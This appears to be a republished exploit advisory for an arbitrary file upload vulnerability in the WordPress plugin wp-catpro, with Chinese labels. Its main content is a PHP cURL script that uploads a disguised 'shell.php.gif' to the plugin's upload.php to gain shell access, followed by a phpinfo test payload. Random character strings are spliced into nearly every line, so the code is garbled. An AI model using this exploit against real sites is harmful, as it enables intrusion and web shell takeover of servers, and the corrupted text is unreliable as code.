Wordpress plugins - wp-catpro Arbitrary File Upload Vulnerability- r5 d0 V p# V
#-----------------------------------------------------------------------$ I, D' G9 `2 D; v9 V; w- p# U& Y
% D* j2 C" N& I
作者 => Zikou-16
; I3 m% Y( i( j) m' s邮箱 => zikou16x@gmail.com" g$ u2 Y; l/ n8 [, p/ W9 ~
测试系统 : Windows 7 , Backtrack 5r3
+ _- c) K3 S5 l* X2 E/ f& |下载地址 : http://xmlswf.com/images/stories/WP_plugins/wp-catpro.zip: t' s5 W* n8 L I" ]. I# r
####2 x" A) F9 Y0 }% n4 } m
0 c, |& Y+ y _0 k; L#=> Exploit 信息:# l; F* b2 x& P1 P4 e6 R
------------------
9 w Q1 p( ?5 G# 攻击者可以上传 file/shell.php.gif
1 U" a$ h5 q: O) D# t! B# ("jpg", "gif", "png") // Allowed file extensions, Z3 u# e; z. y! \/ H
# "/uploads/"; // The path were we will save the file (getcwd() may not be reliable and should be tested in your environment)6 P7 X5 ~: y/ H+ i+ B9 G
# '.A-Z0-9_ !@#$%^&()+={}\[\]\',~`-'; // Characters allowed in the file name (in a Regular Expression format)
! J5 ?, M. m" _) h" |------------------
3 l6 Z' g" u$ ~) T E3 F# Z / m1 o# ^) z) u% ~( L1 q8 H6 l: Z
#=> Exploit& v* e( D% o; L6 p7 D& D- M6 F0 s
-----------* C4 s3 L2 M' \& Y& Y
<?php p) x2 O/ k" N' J' ?/ l7 W
0 x6 A8 q" U, r$uploadfile="zik.php.gif";
: E% U5 o5 s7 C5 n, q# m$ch = curl_init("http://[ www.2cto.com ]/[path]/wp-content/plugins/wp-catpro/js/swfupload/js/upload.php");
" d8 Z$ r% V$ }curl_setopt($ch, CURLOPT_POST, true);2 T" I( _5 J+ Q$ C
curl_setopt($ch, CURLOPT_POSTFIELDS,
r Y9 P( K2 \) M& y4 Carray('Filedata'=>"@$uploadfile",
6 \: e# ^1 s( ]- [' q'folder'=>'/wp-content/uploads/catpro/'));
P1 a9 E" @4 N# Ocurl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
n$ Z+ Z' ~2 I$postResult = curl_exec($ch);
, j+ J6 l- z1 T: Kcurl_close($ch);9 L* V; W- |4 B7 Y1 q; R9 o+ Y
1 q8 R+ E7 ]# |( t* H/ L
print "$postResult";7 A4 h4 r& J7 y: q. E4 p
; _; @* T8 B) w7 b( o8 m5 k6 T
Shell Access : http://[ www.xxx.com ]/[path]/wp-content/uploads/catpro/random_name.php.gif" n# k- K* w" C, Q2 F* }% {
?>
0 O$ \$ b- ?% V- r# b4 y; _, V<?php$ f. [: t* N9 d" w2 k
phpinfo();
z7 p6 n3 H, P) c?> |